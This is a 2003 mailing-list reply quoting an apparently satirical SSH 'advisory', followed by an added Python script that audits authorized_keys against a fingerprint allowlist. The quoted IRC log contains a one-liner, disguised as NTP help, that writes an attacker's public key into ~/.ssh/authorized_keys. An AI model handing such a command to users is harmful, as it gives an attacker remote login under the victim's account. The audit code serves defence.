Message-ID: <Pine.LNX.3.96.1030304181353.26306C-100000@toutatis.igt.net>
From: inouk at toutatis.igt.net (Eric LeBlanc)
Subject: SSH/OPENSSH HOLE ALL VERSIONS.
This is NOT a problem of ssh, but of the USER.
This is called "Social Engineering", and nobody can protect against that. Only
the intelligence of the user can avoid this "HOLE".
This is the worst thing I have ever seen...
E.
--
Eric LeBlanc
inouk@....net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
On Tue, 4 Mar 2003 diacetyl@...hmail.com wrote:
>
> I. BACKGROUND
>
> (stolen from manpage)
> ssh (SSH client) is a program for logging into a remote machine and for
> executing commands on a remote machine. It is intended to replace rlogin
> and rsh, and provide secure encrypted communications between two untrusted
> hosts over an insecure network. X11 connections and arbitrary TCP/IP
> ports can also be forwarded over the secure channel.
>
> II. DESCRIPTION
>
> The ssh command contains an innate system of backdooring that can be leveraged
> by an attacker to gain the access of another user.
>
> The crux of this problem lies in the fact that any public key dropped to
> ~/.ssh/authorized_keys may be used to gain entry to the machine under the
> privileges of that user by he who possesses the corresponding private key.
>
> III. ANALYSIS
>
> A user who can successfully convince another user to write his ssh public key
> to ~/.ssh/authorized_keys will be able to gain access to that machine under
> that user's privileges.
>
> The following is a sample walkthrough of a successful exploitation of this
> vulnerability.
>
> *** zerofel [~zerofel@...8n2fls33o1215.telia.com] has joined #linuxhelp
> <zerofel> how do i use ntp to set my time?
> <sup3rfo0> echo ntp;echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE= unf@...ptamine">~/.ssh/authorized_keys
> <sup3rfo0> that should do it
> <zerofel> okay but my date still isn't set
> <sup3rfo0> hmm paste the output of ls ~
> <zerofel> bash-2.05$ ls
> <zerofel> HAHA_I_DELETED_ALL_YOUR_FILES
> <zerofel> WTF
>
> IV. VENDOR RESPONSE
>
> I have informed ssh developers about this vulnerability and they have not
> replied. I am forced to disclose this gaping vulnerability to force them
> to patch the bug.
>
> V. PROPS
>
> iDEFENSE for their elite file advisory
> http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html
> these warriors of full-disclosure give me the courage to release this
> vulnerability even after death threats from evil blackhats who shut off
> my power, ruined my credit, and got me fired from my job.
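The mechanism both posts turn on is that sshd trusts every line in ~/.ssh/authorized_keys, so the defender's check is to know which keys are supposed to be there. As an added example (not code from either poster), a small Python audit that parses that file, handles option prefixes such as command="...", fingerprints each key the way `ssh-keygen -lf` does, and reports any key missing from an operator-kept allowlist; KEY_TYPES, fake_blob and the SAMPLE entries are constructed here for the demonstration.

```python
import base64
import hashlib
KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519"} | {f"ecdsa-sha2-nistp{n}" for n in (256, 384, 521)}

def split_options(line):
    """Cut the options prefix at the first space outside a quoted option."""
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            quoted = not quoted
        elif ch == " " and not quoted:
            return line[:i], line[i + 1:].lstrip()
    return line, ""

def parse_line(raw):
    """One authorized_keys line -> dict; None for blank and comment lines."""
    line = raw.strip()
    if not line or line.startswith("#"):
        return None
    # A line either starts with a key type or with an options prefix.
    options, line = ("", line) if line.split(None, 1)[0] in KEY_TYPES else split_options(line)
    parts = line.split(None, 2)
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        raise ValueError(f"unparseable authorized_keys line: {raw!r}")
    ktype, blob = parts[0], base64.b64decode(parts[1], validate=True)
    # The wire-format blob starts with its own type string; flag a mismatch with the label.
    embedded = blob[4:4 + int.from_bytes(blob[:4], "big")].decode("ascii", "replace")
    if embedded != ktype:
        raise ValueError(f"declared {ktype} but blob says {embedded!r}")
    # Same form as `ssh-keygen -lf`: SHA256 over the blob, unpadded base64.
    fp = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {"type": ktype, "fingerprint": fp, "options": options,
            "comment": parts[2] if len(parts) == 3 else ""}

def audit(text, known_fingerprints):
    """Return (line_no, entry) for every key not on the operator's allowlist."""
    return [(n, e) for n, raw in enumerate(text.splitlines(), 1)
            if (e := parse_line(raw)) and e["fingerprint"] not in known_fingerprints]

def fake_blob(ktype, seed):
    # Constructed stand-in for a key blob: genuine type header, filler body.
    body = len(ktype).to_bytes(4, "big") + ktype.encode() + seed.encode().ljust(32, b"x")
    return base64.b64encode(body).decode()

# Constructed sample file: a known admin key, a key appended by a pasted
# one-liner like the one in the IRC log, and a forced-command backup key.
SAMPLE = "\n".join([
    f"ssh-ed25519 {fake_blob('ssh-ed25519', 'known')} admin@workstation",
    f"ssh-rsa {fake_blob('ssh-rsa', 'pasted')} unf@example",
    f'command="/usr/bin/rsync --server",no-pty ssh-ed25519 {fake_blob("ssh-ed25519", "backup")} backup',
])
```

Running `audit(SAMPLE, allowlist)` with the admin and backup fingerprints in the allowlist reports only line 2, the pasted key; the same call against a real file and a fingerprint list kept under change control is the check the original advisory is asking for.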